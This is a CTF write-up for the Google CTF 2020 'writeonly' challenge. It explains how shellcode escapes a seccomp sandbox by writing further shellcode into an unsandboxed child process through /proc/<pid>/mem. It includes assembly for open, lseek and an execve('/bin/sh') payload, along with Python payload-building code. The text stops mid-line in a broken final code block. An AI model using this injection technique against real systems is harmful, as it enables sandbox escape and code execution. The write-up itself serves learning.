Tags: shellcode seccomp

# Google CTF 2020 - writeonly

_tl;dr: bypass seccomp by using shellcode to inject more shellcode into an unsandboxed child process, which then reads the flag_

> This sandbox executes any shellcode you send. But thanks to seccomp, you won't be able to read /home/user/flag.

For this challenge, we are given the binary, the C source code, and a Makefile.

## Analyzing the binary

Since we were given source code, I didn't actually have to look at the binary in IDA much. The first thing I looked at was the seccomp rules being applied:

```c
void setup_seccomp() {
  scmp_filter_ctx ctx;
  ctx = seccomp_init(SCMP_ACT_KILL);  // default action: kill on any syscall not listed
  int ret = 0;
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(stat), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fstat), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(lstat), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(lseek), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(writev), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(access), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sched_yield), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(dup), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(dup2), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(clone), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fork), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(vfork), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(execve), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(kill), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(chdir), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fchdir), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(gettimeofday), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getuid), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getgid), 0);
  ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
  ret |= seccomp_load(ctx);  // install the filter in the kernel
  if (ret) {
    exit(1);
  }
}
```


If the seccomp rules aren't written carefully, there's a chance you can use an x32 ABI syscall (a syscall number with the 0x40000000 bit set) to bypass the filters ([see this writeup from RedRocket](http://blog.redrocket.club/2019/04/11/midnightsunctf-quals-2019-gissa2/)). Unfortunately, these filters check the architecture and reject syscall numbers >= 0x40000000, which we can see using [seccomp-tools](https://github.com/david942j/seccomp-tools):


```
$ seccomp-tools dump ./chal
[DEBUG] child pid: 624286
shellcode length? 1
reading 1 bytes of shellcode. a
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x1e 0xc000003e  if (A != ARCH_X86_64) goto 0032
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x1b 0xffffffff  if (A != 0xffffffff) goto 0032
 0005: 0x15 0x19 0x00 0x00000001  if (A == write) goto 0031
 0006: 0x15 0x18 0x00 0x00000002  if (A == open) goto 0031
 0007: 0x15 0x17 0x00 0x00000003  if (A == close) goto 0031
 0008: 0x15 0x16 0x00 0x00000004  if (A == stat) goto 0031
 0009: 0x15 0x15 0x00 0x00000005  if (A == fstat) goto 0031
 0010: 0x15 0x14 0x00 0x00000006  if (A == lstat) goto 0031
 0011: 0x15 0x13 0x00 0x00000008  if (A == lseek) goto 0031
 0012: 0x15 0x12 0x00 0x0000000a  if (A == mprotect) goto 0031
 0013: 0x15 0x11 0x00 0x0000000c  if (A == brk) goto 0031
 0014: 0x15 0x10 0x00 0x00000014  if (A == writev) goto 0031
 0015: 0x15 0x0f 0x00 0x00000015  if (A == access) goto 0031
 0016: 0x15 0x0e 0x00 0x00000018  if (A == sched_yield) goto 0031
 0017: 0x15 0x0d 0x00 0x00000020  if (A == dup) goto 0031
 0018: 0x15 0x0c 0x00 0x00000021  if (A == dup2) goto 0031
 0019: 0x15 0x0b 0x00 0x00000038  if (A == clone) goto 0031
 0020: 0x15 0x0a 0x00 0x00000039  if (A == fork) goto 0031
 0021: 0x15 0x09 0x00 0x0000003a  if (A == vfork) goto 0031
 0022: 0x15 0x08 0x00 0x0000003b  if (A == execve) goto 0031
 0023: 0x15 0x07 0x00 0x0000003c  if (A == exit) goto 0031
 0024: 0x15 0x06 0x00 0x0000003e  if (A == kill) goto 0031
 0025: 0x15 0x05 0x00 0x00000050  if (A == chdir) goto 0031
 0026: 0x15 0x04 0x00 0x00000051  if (A == fchdir) goto 0031
 0027: 0x15 0x03 0x00 0x00000060  if (A == gettimeofday) goto 0031
 0028: 0x15 0x02 0x00 0x00000066  if (A == getuid) goto 0031
 0029: 0x15 0x01 0x00 0x00000068  if (A == getgid) goto 0031
 0030: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0032
 0031: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0032: 0x06 0x00 0x00 0x00000000  return KILL
```

At this point I knew there wasn't going to be a trick to fully bypass the filters, so I needed to find a way to work within them to read the flag. We can make open and write syscalls, but we don't have read or mmap, so we can't read the flag off the file descriptor. I spent a few hours combing the man pages to try to find a trick with one of the other allowed syscalls but came up empty-handed.

One other interesting thing this binary does is fork a child process before applying the seccomp filters, so the filters aren't applied to the child process:

```c
113 void check_flag() {
114   while (1) {
115     char buf[4] = "";
116     int fd = check(open("/home/user/flag", O_RDONLY), "open(flag)");
117     if (read(fd, buf, sizeof(buf)) != sizeof(buf)) {
118       err(1, "read(flag)");
119     }
120     close(fd);
121     if (memcmp(buf, "CTF{", sizeof(buf)) != 0) {
122       errx(1, "flag doesn't start with CTF{");
123     }
124     sleep(1);
125   }
126 }
127
128 int main(int argc, char *argv[]) {
129   pid_t pid = check(fork(), "fork");
130   if (!pid) {
131     while (1) {
132       check_flag();
133     }
134     return 0;
135   }
136
137   printf("[DEBUG] child pid: %d\n", pid);
138   void_fn sc = read_shellcode();
139   setup_seccomp();
140   sc();
141
142   return 0;
143 }
```

The check_flag() function at L113 is run in the child process (because pid will be 0 for the child proc at L130), but all the function does is read the first 4 characters of the flag. At this point I was stumped, until my teammate suggested something _brilliant_:

> Only idea I've got so far for writeonly is to open /proc/${child_pid}/mem and overwrite its stack to make it print out the flag, or something like that.

This led me to two realizations:

* I didn't know that a parent process had permission to write to a child process's `/proc/<pid>/mem` file.
* I _also_ didn't know that the memory permissions (r/w/x on each page) don't apply when accessing memory via `/proc/<pid>/mem` (I figured this out later, after wasting a bunch of time on less-than-ideal exploit paths).

## Writing the exploit

I initially tried to do this a few different ways:

* Write shellcode to an unused chunk of .bss, apply execute permissions with mprotect, and hijack the saved rip value from the sleep(1) call on L124 (this was a very dumb idea)
* Then, I tried to overwrite a function in .text that isn't being used (since it's already marked as executable memory), and hijack the saved rip again (less dumb but still not very smart)
* Finally, I overwrote the beginning of the while (1) loop on L114 to take advantage of the existing control flow for shellcode execution (good enough; detailed below)

Another syscall that was crucial for writing this exploit is lseek. In case you are unfamiliar, lseek lets you move a file descriptor's offset to an arbitrary position. Since we are accessing `/proc/<pid>/mem` (a special file through which the kernel exposes a process's virtual address space, with file offsets corresponding to virtual addresses), we need lseek to choose the address our write starts at.

With this newfound knowledge in hand, I wrote an exploit that did the following:

1. open syscall to access the child proc/mem file
2. lseek syscall to set the pointer to the location in .text I wanted to overwrite
3. write syscall to write my shellcode to the desired location
4. Cross my fingers and hope for a flag
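
The first three steps boil down to an open/seek/write sequence. Here is a rough sketch of that pattern in Python rather than shellcode, with an ordinary temporary file standing in for `/proc/<pid>/mem`. The helper names `patch_at` and `demo` are made up for illustration, and this is not the exploit itself:

```python
import os
import tempfile


def patch_at(path: str, offset: int, payload: bytes) -> int:
    """Overwrite len(payload) bytes of `path` starting at `offset`.

    Mirrors the open -> lseek -> write sequence from the list above.
    In the real exploit `path` would be /proc/<pid>/mem and `offset`
    a virtual address in the child; here it is just a regular file.
    """
    fd = os.open(path, os.O_WRONLY)        # step 1: open, write-only
    try:
        os.lseek(fd, offset, os.SEEK_SET)  # step 2: move the file offset
        return os.write(fd, payload)       # step 3: write at that offset
    finally:
        os.close(fd)


def demo() -> bytes:
    """Patch two bytes in the middle of a 16-byte stand-in 'memory' file."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"\x90" * 16)
        path = f.name
    try:
        patch_at(path, 4, b"\xcc\xcc")
        with open(path, "rb") as f:
            return f.read()
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo().hex())
```

Only the bytes at the chosen offset change; everything around them is left alone, which is why the write can be aimed at one specific spot in the child's code.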

## Step 1: open

_Note: please don't take the following as advice on a good way to do this, use [asm() in pwntools](https://docs.pwntools.com/en/stable/asm.html) and your life will be much easier._

The goal for this first syscall is to create a file descriptor for the child's `/proc/<pid>/mem` file. Unfortunately, since the PID of the child could change every time, I needed to parse the PID from the program's output, substitute it into my shellcode, assemble it, and then send it so that it opens the proper file.

(It turns out that on the remote, the child PID always ended up being 2, probably due to how the Docker container was set up and the lack of other processes, so I could have just statically compiled it. But where's the fun in that?)
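
Parsing the PID can be as simple as a regular expression over the banner the binary prints. This is a minimal sketch, assuming the `[DEBUG] child pid: %d` format from the `printf` in `main`. The function name `parse_child_pid` is hypothetical, and how the bytes are received from the process or socket is left out:

```python
import re

# Matches the banner printed by the challenge: "[DEBUG] child pid: <digits>"
PID_RE = re.compile(rb"\[DEBUG\] child pid: (\d+)")


def parse_child_pid(banner: bytes) -> str:
    """Extract the child PID (as a decimal string) from the program's output."""
    match = PID_RE.search(banner)
    if match is None:
        raise ValueError("child pid line not found in program output")
    return match.group(1).decode()


if __name__ == "__main__":
    print(parse_child_pid(b"[DEBUG] child pid: 624286\nshellcode length? "))
```

Keeping the PID as a string is convenient here, since the next step pads and hex-encodes it as text.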

Here's a snippet from my exploit that dynamically compiles the shellcode:

```py
40 with open("sc/inject.S", "r") as f:
41     inject_code = f.read()
42
43 log.info(f"child pid: {pid}")
44
45 while len(pid) != 8:
46     pid += "/"
47
48 with open("sc/shellcode.S", "w") as f:
49     f.write(inject_code.format(pid=pid[::-1].encode().hex()))
50
51 os.system("cd sc && make 64")
52
53 with open("sc/shellcode.bin", "rb") as f:
```


In my shellcode, I used `{pid}` as a format placeholder so Python could substitute the PID (L49 above), encoded so that it ends up as a string on the stack:

```asm
23 // Open the child memory file
24 // fd = open("/proc/{pid}/mem", 1)
25 xor %rdx, %rdx
26 push %rdx
27 mov $0x6d656d2f2f2f2f2f, %rdx
28 push %rdx
29 mov $0x{pid}, %rdx
30 push %rdx
31 mov $0x2f636f72702f2f2f, %rdx
32 push %rdx
33 mov %rsp, %rdi
34 xor %rsi, %rsi
35 inc %rsi
36 xor %rax, %rax
37 mov $0x2, %al
38 syscall
39 mov %rax, %r9
```


The {pid} on L24 and L29 both got replaced by the reverse hex encoding of the PID (as a string), so that the string is properly built on the stack. An example ASCII version of that string is:


```
///proc/2////////////mem
```


(You can put as many slashes between directories as you want, the above is equivalent to /proc/2/mem. It's a great way to pad strings.)
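
To sanity-check the byte order, the string can be rebuilt outside the shellcode. The sketch below assumes the padding loop and the two fixed immediates from the snippets above. The helper names `pid_immediate` and `stack_string` are invented for illustration. With right-padding followed by a reverse, the PID lands at the start of its 8-byte chunk:

```python
import posixpath
import struct


def pid_immediate(pid: str) -> str:
    """Hex immediate substituted for {pid}: pad to 8 chars with '/', reverse, hex-encode."""
    if not 1 <= len(pid) <= 8:
        raise ValueError("pid must be 1 to 8 characters")
    padded = pid.ljust(8, "/")
    return padded[::-1].encode().hex()


def stack_string(pid: str) -> str:
    """Rebuild the bytes the three pushes leave on the stack, lowest address first."""
    immediates = [
        0x2F636F72702F2F2F,           # pushed last, so it sits at the lowest address
        int(pid_immediate(pid), 16),  # the {pid} chunk
        0x6D656D2F2F2F2F2F,           # pushed right after the NUL terminator qword
    ]
    # Each push stores its 64-bit value little-endian.
    return b"".join(struct.pack("<Q", imm) for imm in immediates).decode()


if __name__ == "__main__":
    path = stack_string("2")
    print(path)
    print(posixpath.normpath(path))  # collapses the repeated slashes
```

Reversing the string before hex-encoding cancels out the little-endian store, which is why the text reads left to right in memory.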

## Step 2: lseek

Now that we have a file descriptor to the child's memory, we need to figure out where exactly to write to. I pulled open the binary in IDA and looked for a suitable address.

After the sleep(1) call returns, the program jumps back to 0x40223a, which is the beginning of the while (1) loop at L114. That seems like a solid candidate to overwrite:

```asm
// lseek(fd, 0x40223a, 0)
mov %r9, %rdi
mov $0x40223a, %rsi // jmp dst after sleep in check_flag
xor %rdx, %rdx
xor %rax, %rax
mov $0x8, %al
syscall
```


## Step 3: write

Now that we are positioned in the proper location to overwrite with our shellcode, we need to figure out _what_ that shellcode will be. During the CTF, I used a standard ORW (open/read/write) payload to print the flag file, since I wasn't sure how I/O would work if I tried to pop a shell in the child process. After getting the flag I tested popping a shell, and it worked as it normally would, so that's the solution I have in the inject.S file. The ORW shellcode is also available to look at, though.

Here is the execve("//bin/sh", 0, 0) shellcode I used:

```asm
//execve("//bin/sh", 0, 0)
xor %rdx, %rdx
xor %rsi, %rsi
mov $0x68732f6e69622f2f, %rdi
push %rsi
push %rdi
mov %rsp, %rdi
xor %rax, %rax
mov $0x3b, %al
syscall
```


Now, I needed some way of putting the above shellcode payload into the full payload, since I was using shellcode to write shellcode into the child process. I did this by writing a quick script to generate a series of mov and push instructions to put the shellcode on the stack in the proper order (yay little endian):

`py
10 while len(shellcode) % 8 != 0:
11 shellcode += b"\x90"
12
13 for i in range(len(shellcode), 0, -8):
14 b = struct.unpack("